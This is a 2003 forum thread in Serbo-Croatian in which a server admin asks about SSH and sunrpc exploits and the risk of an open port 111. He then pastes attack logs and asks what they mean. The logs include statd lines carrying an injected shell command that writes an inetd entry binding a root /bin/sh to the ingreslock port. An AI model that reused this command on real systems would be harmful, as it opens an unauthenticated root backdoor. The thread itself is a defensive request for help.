Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

SSH i sunrpc

[es] :: Security :: SSH i sunrpc

[ Pregleda: 2409 | Odgovora: 3 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

bagz

Član broj: 5124
Poruke: 4
*.mweb.co.za



Profil

icon SSH i sunrpc16.02.2003. u 17:33 - pre 258 meseci
Zanima me da li bi neko mogao da mi da malo vise informacija o ova dva exploit-a i nravano sam kod. hmm pogledao sam po netu ali nigde ne mogu da nadjem kako u stavri rade ovi expoliti samo kako ih spreciti. Jedan od servera koje iamam ima otovren port sunrpc 111 koliko je to tesko ili lako kompromizovati i sta ako je taj port "filterd" od starne iptables-a da li je to i dalje problem. havala unapred.
 
Odgovor na temu

DownBload

Član broj: 1333
Poruke: 310
*.net.hinet.hr



Profil

icon Re: SSH i sunrpc16.02.2003. u 19:27 - pre 258 meseci
SSH je Secure Shell, a RPC je Remote Procedure Call, ne znam kako si ti to odmah povezao sa exploitovima.

Leon Juranic
 
Odgovor na temu

B o j a n
eCTRL
EU

Član broj: 1178
Poruke: 2925
194.247.209.*

Jabber: bc@default.co.yu
Sajt: default.co.yu/~bc


+1 Profil

icon Re: SSH i sunrpc17.02.2003. u 00:46 - pre 258 meseci
Citat:
bagz:
Jedan od servera koje iamam ima otovren port sunrpc 111 koliko je to tesko ili lako kompromizovati

Jedan od najcescih razloga zasto neki "server ima otvoren xxx port" je ( gle cuda ), da pruzi nekakvu uslugu. Ta usluga moze da varira, i obicno se koristi u korisne svhre ( citanje poste, razmena email-a, pregled web sajta, itd ... ).

I sad, koje je tvoje pitanje ?

"It's okay, I'm just admiring to the shape of your skull!" -- Dr. Gonzo
 
Odgovor na temu

bagz

Član broj: 5124
Poruke: 4
*.mweb.co.za



Profil

icon Re: SSH i sunrpc17.02.2003. u 21:14 - pre 257 meseci
da da u pravu si nisam ovo hmm precizno pitao ovako prvo pitanje:
1) znam za stari bug za ssh1 nema veze ovo sam nasao.
2) znam sta je sunrpc i znam da je na portu 111 zanima me sunrpc portmap napadi recimo log deluje ovako nekako:
rpc.xxx[1706]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc.ttdbserverd: Child Status Changed - core dumped
rpc.xxx[1707]: iserase(): 78
rpc.xxx[1707]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc: Child Status Changed - core dumped
rpc.xxx[1708]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc: Child Status Changed - core dumped
rpc.xxx[1709]: iserase(): 78
rpc.xxx[1709]: iserase(): 78
rpc.xxx[1709]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
inetd[127]: /usr/dt/bin/rpc: Child Status Changed - core dumped
ttdbserverd[1710]: iserase(): 78
ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
statd[130]: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
statd[130]: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
itd itd ....
ako bi ovo neko moagao da malo razjasni
hvala u napred

 
Odgovor na temu

[es] :: Security :: SSH i sunrpc

[ Pregleda: 2409 | Odgovora: 3 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.